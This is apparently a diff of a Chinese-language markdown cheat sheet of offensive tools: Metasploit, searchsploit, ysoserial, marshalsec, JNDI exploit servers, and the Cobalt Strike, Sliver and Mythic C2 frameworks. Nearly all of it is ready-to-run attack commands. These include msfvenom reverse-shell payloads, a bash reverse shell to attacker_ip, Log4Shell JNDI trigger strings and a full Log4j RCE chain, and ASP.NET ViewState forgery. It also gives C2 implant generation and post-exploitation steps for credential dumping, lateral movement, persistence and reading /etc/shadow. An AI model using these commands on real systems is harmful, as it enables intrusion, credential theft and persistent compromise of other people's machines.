|
|
68
|
+
_platform: linux_
|
|
69
|
+
```
|
|
70
|
+
exploit
|
|
71
|
+
```
|
|
72
|
+
**语法解析:**
|
|
73
|
+
- `exploit` — 执行攻击命令 _command_
|
|
74
|
+
|
|
75
|
+
**Step 0**
|
|
76
|
+
> 在后台执行攻击
|
|
77
|
+
_platform: linux_
|
|
78
|
+
```
|
|
79
|
+
exploit -j
|
|
80
|
+
```
|
|
81
|
+
**语法解析:**
|
|
82
|
+
- `-j` — 后台任务模式 _parameter_
|
|
83
|
+
|
|
84
|
+
**Step 0**
|
|
85
|
+
> 使用msfvenom生成恶意文件
|
|
86
|
+
_platform: linux_
|
|
87
|
+
```
|
|
88
|
+
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o payload.exe
|
|
89
|
+
```
|
|
90
|
+
**语法解析:**
|
|
91
|
+
- `msfvenom` — MSF载荷生成工具 _command_
|
|
92
|
+
- `-p` — 指定载荷 _parameter_
|
|
93
|
+
- `-f exe` — 输出格式 _parameter_
|
|
94
|
+
- `-o` — 输出文件 _parameter_
|
|
95
|
+
|
|
96
|
+
**Step 0**
|
|
97
|
+
> Meterpreter会话中的常用命令
|
|
98
|
+
_platform: linux_
|
|
99
|
+
```
|
|
100
|
+
sysinfo
|
|
101
|
+
getuid
|
|
102
|
+
hashdump
|
|
103
|
+
```
|
|
104
|
+
|
|
105
|
+
---
|
|
106
|
+
|
|
107
|
+
### Searchsploit `searchsploit`
|
|
108
|
+
_Exploit-DB本地搜索工具,离线查找漏洞利用代码_
|
|
109
|
+
|
|
110
|
+
**Step 0**
|
|
111
|
+
> 按关键词搜索漏洞利用
|
|
112
|
+
```
|
|
113
|
+
searchsploit apache 2.4
|
|
114
|
+
searchsploit wordpress 5.0
|
|
115
|
+
```
|
|
116
|
+
**语法解析:**
|
|
117
|
+
- `searchsploit` — Exploit-DB本地搜索工具 _command_
|
|
118
|
+
|
|
119
|
+
**Step 0**
|
|
120
|
+
> 精确匹配和排除关键词
|
|
121
|
+
```
|
|
122
|
+
searchsploit -e "Apache Tomcat"
|
|
123
|
+
searchsploit --exclude="dos" windows smb
|
|
124
|
+
```
|
|
125
|
+
|
|
126
|
+
**Step 0**
|
|
127
|
+
> 复制exploit到当前目录或显示路径
|
|
128
|
+
```
|
|
129
|
+
searchsploit -m 44228
|
|
130
|
+
searchsploit -p 44228
|
|
131
|
+
```
|
|
132
|
+
|
|
133
|
+
**Step 0**
|
|
134
|
+
> JSON格式输出便于脚本处理
|
|
135
|
+
```
|
|
136
|
+
searchsploit -j apache | jq ".RESULTS_EXPLOIT[]"
|
|
137
|
+
```
|
|
138
|
+
|
|
139
|
+
---
|
|
140
|
+
|
|
141
|
+
### ExploitDB `exploitdb`
|
|
142
|
+
_漏洞利用代码数据库在线搜索_
|
|
143
|
+
|
|
144
|
+
**Step 0**
|
|
145
|
+
> 在线搜索漏洞利用代码
|
|
146
|
+
```
|
|
147
|
+
# 访问 https://www.exploit-db.com
|
|
148
|
+
# 搜索框输入: Apache Struts
|
|
149
|
+
# 或使用Google Dork:
|
|
150
|
+
site:exploit-db.com "Apache Struts" RCE
|
|
151
|
+
```
|
|
152
|
+
|
|
153
|
+
**Step 0**
|
|
154
|
+
> 通过API搜索(需要合适的请求头)
|
|
155
|
+
```
|
|
156
|
+
curl "https://www.exploit-db.com/search?q=wordpress+5.0" -H "X-Requested-With: XMLHttpRequest"
|
|
157
|
+
```
|
|
158
|
+
|
|
159
|
+
**Step 0**
|
|
160
|
+
> 使用ExploitDB的Google Hacking数据库
|
|
161
|
+
```
|
|
162
|
+
# ExploitDB收录的Google Dorks:
|
|
163
|
+
https://www.exploit-db.com/google-hacking-database
|
|
164
|
+
# 搜索泄露的配置文件、数据库等
|
|
165
|
+
```
|
|
166
|
+
|
|
167
|
+
---
|
|
168
|
+
|
|
169
|
+
### ysoserial `ysoserial`
|
|
170
|
+
_Java反序列化漏洞利用Payload生成工具_
|
|
171
|
+
|
|
172
|
+
**Step 0**
|
|
173
|
+
> 使用指定Gadget Chain生成反序列化Payload
|
|
174
|
+
```
|
|
175
|
+
java -jar ysoserial.jar CommonsCollections1 "id" | base64
|
|
176
|
+
java -jar ysoserial.jar CommonsCollections5 "whoami" > payload.bin
|
|
177
|
+
```
|
|
178
|
+
**语法解析:**
|
|
179
|
+
- `CommonsCollections1` — Gadget Chain名称(依赖目标classpath) _parameter_
|
|
180
|
+
- `"id"` — 要执行的系统命令 _value_
|
|
181
|
+
|
|
182
|
+
**Step 0**
|
|
183
|
+
> 列出所有可用的Gadget Chain
|
|
184
|
+
```
|
|
185
|
+
java -jar ysoserial.jar --help
|
|
186
|
+
# 常用: CommonsCollections1-7, Jdk7u21, URLDNS, JRMPClient
|
|
187
|
+
```
|
|
188
|
+
|
|
189
|
+
**Step 0**
|
|
190
|
+
> 通过JRMP协议进行远程利用
|
|
191
|
+
```
|
|
192
|
+
# 监听端(攻击机):
|
|
193
|
+
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "bash -c {echo,base64_cmd}|{base64,-d}|{bash,-i}"
|
|
194
|
+
|
|
195
|
+
# 发送JRMP客户端Payload:
|
|
196
|
+
java -jar ysoserial.jar JRMPClient attacker_ip:1099 > jrmp.bin
|
|
197
|
+
```
|
|
198
|
+
|
|
199
|
+
**Step 0**
|
|
200
|
+
> 使用URLDNS链探测反序列化漏洞(无需依赖)
|
|
201
|
+
```
|
|
202
|
+
java -jar ysoserial.jar URLDNS "http://your_dnslog.com/test" | base64
|
|
203
|
+
```
|
|
204
|
+
|
|
205
|
+
---
|
|
206
|
+
|
|
207
|
+
### ysoserial.net `ysoserial-net`
|
|
208
|
+
_.NET反序列化Payload生成工具_
|
|
209
|
+
|
|
210
|
+
**Step 0**
|
|
211
|
+
> 生成.NET反序列化Payload
|
|
212
|
+
_platform: windows_
|
|
213
|
+
```
|
|
214
|
+
ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter -c "calc" -o base64
|
|
215
|
+
```
|
|
216
|
+
**语法解析:**
|
|
217
|
+
- `-g` — Gadget Chain名称 _parameter_
|
|
218
|
+
- `-f` — 序列化格式(BinaryFormatter/ObjectStateFormatter等) _parameter_
|
|
219
|
+
- `-c` — 要执行的命令 _parameter_
|
|
220
|
+
- `-o base64` — Base64编码输出 _parameter_
|
|
221
|
+
|
|
222
|
+
**Step 0**
|
|
223
|
+
> 伪造ASP.NET ViewState执行命令
|
|
224
|
+
_platform: windows_
|
|
225
|
+
```
|
|
226
|
+
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd /c whoami" --validationalg=SHA1 --validationkey=MACHINE_KEY --generator=GENERATOR
|
|
227
|
+
```
|
|
228
|
+
|
|
229
|
+
**Step 0**
|
|
230
|
+
> 列出所有可用的Gadget Chain和格式
|
|
231
|
+
_platform: windows_
|
|
232
|
+
```
|
|
233
|
+
ysoserial.exe -l
|
|
234
|
+
# 常用: TextFormattingRunProperties, TypeConfuseDelegate, PSObject
|
|
235
|
+
```
|
|
236
|
+
|
|
237
|
+
---
|
|
238
|
+
|
|
239
|
+
### Marshalsec `marshalsec`
|
|
240
|
+
_Java反序列化利用工具,支持多种Marshal格式和JNDI注入_
|
|
241
|
+
|
|
242
|
+
**Step 0**
|
|
243
|
+
> 启动恶意LDAP服务器用于JNDI注入(Log4Shell等)
|
|
244
|
+
```
|
|
245
|
+
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://attacker_ip:8888/#Exploit" 1389
|
|
246
|
+
```
|
|
247
|
+
**语法解析:**
|
|
248
|
+
- `LDAPRefServer` — 启动LDAP Reference服务器 _command_
|
|
249
|
+
- `"http://attacker_ip:8888/#Exploit"` — 恶意class文件托管URL _value_
|
|
250
|
+
- `1389` — LDAP服务监听端口 _value_
|
|
251
|
+
|
|
252
|
+
**Step 0**
|
|
253
|
+
> 启动恶意RMI服务器
|
|
254
|
+
```
|
|
255
|
+
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://attacker_ip:8888/#Exploit" 1099
|
|
256
|
+
```
|
|
257
|
+
|
|
258
|
+
**Step 0**
|
|
259
|
+
> 配合Log4j2 RCE完整利用链
|
|
260
|
+
```
|
|
261
|
+
# 1. 编译恶意class: javac Exploit.java
|
|
262
|
+
# 2. 托管class: python3 -m http.server 8888
|
|
263
|
+
# 3. 启动LDAP: java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://ip:8888/#Exploit" 1389
|
|
264
|
+
# 4. 触发: ${jndi:ldap://ip:1389/Exploit}
|
|
265
|
+
```
|
|
266
|
+
|
|
267
|
+
---
|
|
268
|
+
|
|
269
|
+
### JNDIExploit `jndi-exploit`
|
|
270
|
+
_JNDI注入利用工具,集成多种Gadget和Bypass_
|
|
271
|
+
|
|
272
|
+
**Step 0**
|
|
273
|
+
> 启动JNDI Exploit服务(同时监听LDAP 1389和HTTP 3456)
|
|
274
|
+
```
|
|
275
|
+
java -jar JNDIExploit.jar -i attacker_ip
|
|
276
|
+
```
|
|
277
|
+
**语法解析:**
|
|
278
|
+
- `-i` — 攻击机IP地址 _parameter_
|
|
279
|
+
|
|
280
|
+
**Step 0**
|
|
281
|
+
> 通过不同路由执行命令或反弹Shell
|
|
282
|
+
```
|
|
283
|
+
# 触发Payload:
|
|
284
|
+
${jndi:ldap://attacker_ip:1389/Basic/Command/Base64/Y21k}
|
|
285
|
+
${jndi:ldap://attacker_ip:1389/Basic/ReverseShell/attacker_ip/4444}
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
**Step 0**
|
|
289
|
+
> 绕过高版本JDK的trustURLCodebase限制
|
|
290
|
+
```
|
|
291
|
+
# 使用Tomcat Bypass:
|
|
292
|
+
${jndi:ldap://attacker_ip:1389/TomcatBypass/Command/Base64/d2hvYW1p}
|
|
293
|
+
# 使用反序列化Bypass:
|
|
294
|
+
${jndi:ldap://attacker_ip:1389/Deserialization/CommonsCollections5/Command/Base64/d2hvYW1p}
|
|
295
|
+
```
|
|
296
|
+
|
|
297
|
+
---
|
|
298
|
+
|
|
299
|
+
### Rogue JNDI `rogue-jndi`
|
|
300
|
+
_恶意JNDI服务器,提供多种攻击向量_
|
|
301
|
+
|
|
302
|
+
**Step 0**
|
|
303
|
+
> 启动恶意JNDI服务(LDAP+RMI+HTTP)
|
|
304
|
+
```
|
|
305
|
+
java -jar RogueJndi.jar --command "whoami" --hostname attacker_ip
|
|
306
|
+
```
|
|
307
|
+
|
|
308
|
+
**Step 0**
|
|
309
|
+
> 配置反弹Shell命令
|
|
310
|
+
```
|
|
311
|
+
java -jar RogueJndi.jar --command "bash -i >& /dev/tcp/attacker_ip/4444 0>&1" --hostname attacker_ip
|
|
312
|
+
```
|
|
313
|
+
|
|
314
|
+
**Step 0**
|
|
315
|
+
> 在目标注入JNDI Lookup触发利用
|
|
316
|
+
```
|
|
317
|
+
# LDAP: ${jndi:ldap://attacker_ip:1389/o=reference}
|
|
318
|
+
# RMI: ${jndi:rmi://attacker_ip:1099/o=reference}
|
|
319
|
+
```
|
|
320
|
+
|
|
321
|
+
---
|
|
322
|
+
|
|
323
|
+
### Cobalt Strike `cobalt-strike`
|
|
324
|
+
_商业化红队C2框架,支持多种攻击和后渗透功能_
|
|
325
|
+
|
|
326
|
+
**Step 0**
|
|
327
|
+
> 启动CS服务端
|
|
328
|
+
_platform: linux_
|
|
329
|
+
```
|
|
330
|
+
./teamserver your_ip your_password malleable_c2_profile.profile
|
|
331
|
+
```
|
|
332
|
+
|
|
333
|
+
**Step 0**
|
|
334
|
+
> 通过图形界面生成各类Payload
|
|
335
|
+
```
|
|
336
|
+
# GUI操作:
|
|
337
|
+
# Attacks > Packages > Windows Executable (S)
|
|
338
|
+
# Attacks > Packages > HTML Application
|
|
339
|
+
# Attacks > Web Drive-by > Scripted Web Delivery
|
|
340
|
+
```
|
|
341
|
+
|
|
342
|
+
**Step 0**
|
|
343
|
+
> 获取Beacon后的常用后渗透命令
|
|
344
|
+
_platform: windows_
|
|
345
|
+
```
|
|
346
|
+
# 基础信息
|
|
347
|
+
whoami
|
|
348
|
+
shell ipconfig
|
|
349
|
+
getuid
|
|
350
|
+
|
|
351
|
+
# 横向移动
|
|
352
|
+
jump psexec target_ip SMB_listener
|
|
353
|
+
jump winrm target_ip HTTP_listener
|
|
354
|
+
|
|
355
|
+
# 凭证获取
|
|
356
|
+
hashdump
|
|
357
|
+
logonpasswords
|
|
358
|
+
|
|
359
|
+
# 持久化
|
|
360
|
+
persist-service
|
|
361
|
+
persist-registry
|
|
362
|
+
```
|
|
363
|
+
|
|
364
|
+
**Step 0**
|
|
365
|
+
> 使用Malleable C2 Profile伪装通信流量
|
|
366
|
+
_platform: linux_
|
|
367
|
+
```
|
|
368
|
+
# 使用C2 Profile伪装流量:
|
|
369
|
+
# https://github.com/rsmudge/Malleable-C2-Profiles
|
|
370
|
+
./teamserver ip pass jquery-c2.4.0.profile
|
|
371
|
+
```
|
|
372
|
+
|
|
373
|
+
---
|
|
374
|
+
|
|
375
|
+
### Sliver `sliver`
|
|
376
|
+
_开源跨平台红队C2框架,Cobalt Strike替代品_
|
|
377
|
+
|
|
378
|
+
**Step 0**
|
|
379
|
+
> 启动Sliver服务端
|
|
380
|
+
_platform: linux_
|
|
381
|
+
```
|
|
382
|
+
sliver-server
|
|
383
|
+
```
|
|
384
|
+
|
|
385
|
+
**Step 0**
|
|
386
|
+
> 生成各平台的植入体
|
|
387
|
+
```
|
|
388
|
+
# 在Sliver控制台:
|
|
389
|
+
generate --mtls attacker_ip --os windows --arch amd64 --save implant.exe
|
|
390
|
+
generate --http attacker_ip --os linux --format shared --save implant.so
|
|
391
|
+
```
|
|
392
|
+
|
|
393
|
+
**Step 0**
|
|
394
|
+
> 启动mTLS/HTTPS/WireGuard监听器
|
|
395
|
+
```
|
|
396
|
+
mtls -l 8888
|
|
397
|
+
https -l 443 -d example.com
|
|
398
|
+
wg -l 51820
|
|
399
|
+
```
|
|
400
|
+
|
|
401
|
+
**Step 0**
|
|
402
|
+
> 常用后渗透操作命令
|
|
403
|
+
```
|
|
404
|
+
# 获取Session后:
|
|
405
|
+
info
|
|
406
|
+
getuid
|
|
407
|
+
ps
|
|
408
|
+
download /etc/shadow
|
|
409
|
+
upload local_file /tmp/remote
|
|
410
|
+
execute -o whoami
|
|
411
|
+
pivots tcp --bind 0.0.0.0:9050
|
|
412
|
+
```
|
|
413
|
+
|
|
414
|
+
---
|
|
415
|
+
|
|
416
|
+
### Mythic `mythic`
|
|
417
|
+
_模块化C2框架,支持多种Agent和自定义扩展_
|
|
418
|
+
|
|
419
|
+
**Step 0**
|
|
420
|
+
> 安装Apollo(Windows)或Poseidon(Linux) Agent
|
|
421
|
+
_platform: linux_
|
|
422
|
+
```
|
|
423
|
+
sudo ./mythic-cli install github https://github.com/MythicAgents/Apollo
|
|
424
|
+
sudo ./mythic-cli install github https://github.com/MythicAgents/Poseidon
|
|
425
|
+
```
|
|
426
|
+
|
|
427
|
+
**Step 0**
|
|
428
|
+
> 通过Web界面管理C2操作
|
|
429
|
+
```
|
|
430
|
+
https://attacker_ip:7443
|
|
431
|
+
# 默认账号: mythic_admin
|
|
432
|
+
# 密码查看: cat .env | grep MYTHIC_ADMIN_PASSWORD
|
|
433
|
+
```
|
|
434
|
+
|
|
435
|
+
**Step 0**
|
|
436
|
+
> 通过图形界面配置和生成Payload
|
|
437
|
+
```
|
|
438
|
+
# 在Web界面:
|
|
439
|
+
# 1. 创建Payload Profile
|
|
440
|
+
# 2. 选择Agent类型(Apollo/Poseidon等)
|
|
441
|
+
# 3. 配置C2 Profile
|
|
442
|
+
# 4. 生成Payload下载
|
|
443
|
+
```
|
|
444
|
+
|
|
445
|
+
---
|